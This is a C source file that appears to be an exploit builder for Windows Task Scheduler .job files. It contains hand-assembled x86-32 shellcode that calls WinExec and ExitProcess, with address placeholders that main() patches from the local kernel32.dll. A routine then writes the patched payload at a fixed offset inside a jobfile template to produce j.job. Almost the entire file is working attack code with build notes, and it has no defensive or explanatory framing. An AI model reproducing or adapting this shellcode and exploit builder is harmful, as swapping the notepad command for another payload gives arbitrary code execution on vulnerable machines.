Code:
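/*
 * x86-32 payload: WinExec("notepad.exe", 1) followed by ExitProcess(0).
 *
 * The two 4-byte runs "XXXX" and "YYYY" are placeholders that main()
 * overwrites at build time with the absolute addresses of WinExec and
 * ExitProcess as resolved from *this* machine's kernel32.dll. The finished
 * payload therefore only works where the target maps kernel32 at the same
 * base address (same OS build, no ASLR) -- keep that in mind when testing.
 *
 * The escapes must be "\x" -- a listing with "/x" is plain ASCII text, not
 * machine code. None of the 52 code bytes is 0x00; the 0x90 in front of
 * "not" is filler that keeps the string pushes NUL-free. sizeof(shellcode)
 * is 53 because the literal carries a trailing NUL.
 */
unsigned char shellcode[] =
    "\x33\xc0"             // xor eax, eax
    "\xb0\xf0"             // mov al, 0xf0
    "\x2b\xe0"             // sub esp, eax        ; lower esp by 0xf0 (presumably so the pushes below stay clear of this code)
    "\x83\xe4\xf0"         // and esp, 0xfffffff0 ; 16-byte align the stack
    "\x55"                 // push ebp
    "\x8b\xec"             // mov ebp, esp
    "\x33\xf6"             // xor esi, esi
    "\x56"                 // push esi            ; 4 zero bytes at [ebp-4]: the string terminator
    "\x68\x2e\x65\x78\x65" // push ".exe"         ; [ebp-8]
    "\x68\x65\x70\x61\x64" // push "epad"         ; [ebp-12]
    "\x68\x90\x6e\x6f\x74" // push "\x90not"      ; [ebp-16]; byte 0x90 is padding, not part of the name
    "\x46"                 // inc esi             ; esi = 1 (SW_SHOWNORMAL)
    "\x56"                 // push esi            ; uCmdShow
    "\x8d\x7d\xf1"         // lea edi, [ebp-0xf]  ; skips the pad byte: edi -> "notepad.exe\0"
    "\x57"                 // push edi            ; lpCmdLine
    "\xb8XXXX"             // mov eax, imm32      ; patched to &WinExec by main()
    "\xff\xd0"             // call eax
    "\x4e"                 // dec esi             ; esi = 0
    "\x56"                 // push esi            ; uExitCode
    "\xb8YYYY"             // mov eax, imm32      ; patched to &ExitProcess by main()
    "\xff\xd0";            // call eax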
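/* Byte offset inside the jobfile template where the payload is placed. */
enum { JOB_PAYLOAD_OFFSET = 31 * 16 };

/*
 * Replace every 4-byte run of buf[0..len) equal to `marker` with the
 * address of `sym` resolved from kernel32.dll in this process.
 *
 * The address is the builder's own kernel32 mapping, so the payload is only
 * valid on a target that maps kernel32 at the same base. The low 4 bytes of
 * the address are copied in memory order, which matches the x86-32
 * `mov eax, imm32` in the payload on a little-endian host; this tool is
 * Windows/x86-only by construction.
 *
 * Scans by length rather than stopping at the first 0x00, so a patched
 * address that happens to contain a zero byte cannot truncate the scan, and
 * the 4-byte compare never reads past the end of buf.
 *
 * Returns 0 if the symbol resolved and at least one marker was patched,
 * -1 otherwise (diagnostic on stderr).
 */
static int patch_import(unsigned char *buf, size_t len, const char marker[4], const char *sym)
{
    unsigned long addr = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), sym);
    size_t i;
    int patched = 0;

    if (addr == 0) {
        fprintf(stderr, "cannot resolve kernel32!%s\n", sym);
        return -1;
    }
    for (i = 0; i + 4 <= len; i++) {
        if (memcmp(buf + i, marker, 4) == 0) {
            memcpy(buf + i, &addr, 4);    /* memcpy: no misaligned long* store */
            patched = 1;
        }
    }
    if (!patched) {
        fprintf(stderr, "placeholder for %s not found in shellcode\n", sym);
        return -1;
    }
    return 0;
}

/*
 * Copy `payload` into the jobfile template at JOB_PAYLOAD_OFFSET, write the
 * template to j.xxx and rename it over j.job.
 *
 * `jobfile` is defined elsewhere in this file (not visible here); it is
 * used as a char array whose content length is sizeof(jobfile)-1, i.e. a
 * string-literal-style template -- confirm against its definition.
 *
 * Returns 0 on success, -1 on any failure (diagnostic on stderr).
 */
static int write_job(const unsigned char *payload, size_t payload_len)
{
    size_t file_len = sizeof(jobfile) - 1;
    FILE *fp;

    /* Bounds-check the template before memcpy: the original wrote blind. */
    if (payload_len > file_len || (size_t)JOB_PAYLOAD_OFFSET > file_len - payload_len) {
        fprintf(stderr, "payload of %lu bytes does not fit in job template (%lu bytes) at offset %d\n",
                (unsigned long)payload_len, (unsigned long)file_len, JOB_PAYLOAD_OFFSET);
        return -1;
    }
    memcpy(jobfile + JOB_PAYLOAD_OFFSET, payload, payload_len);

    fp = fopen("j.xxx", "wb");
    if (!fp) {
        perror("fopen j.xxx");
        return -1;
    }
    if (fwrite(jobfile, 1, file_len, fp) != file_len) {
        perror("fwrite j.xxx");
        fclose(fp);
        return -1;
    }
    if (fclose(fp) != 0) {      /* fclose flushes; a failure here loses data */
        perror("fclose j.xxx");
        return -1;
    }

    /* MoveFile does not overwrite; a failed DeleteFile just means no old j.job. */
    DeleteFile("j.job");
    if (!MoveFile("j.xxx", "j.job")) {
        fprintf(stderr, "MoveFile j.xxx -> j.job failed\n");
        return -1;
    }
    return 0;
}

/*
 * Entry point: patch the WinExec/ExitProcess placeholders in `shellcode`
 * with addresses from this machine's kernel32, then emit j.job containing
 * the payload. argc/argv are unused.
 *
 * Returns 0 on success, 1 if resolution, patching or file output failed.
 */
int main(int argc, char* argv[])
{
    size_t sc_len = sizeof(shellcode) - 1;   /* exclude the literal's trailing NUL */

    (void)argc;
    (void)argv;

    if (patch_import(shellcode, sc_len, "XXXX", "WinExec") != 0 ||
        patch_import(shellcode, sc_len, "YYYY", "ExitProcess") != 0) {
        return 1;
    }
    if (write_job(shellcode, sc_len) != 0) {
        return 1;
    }
    return 0;
}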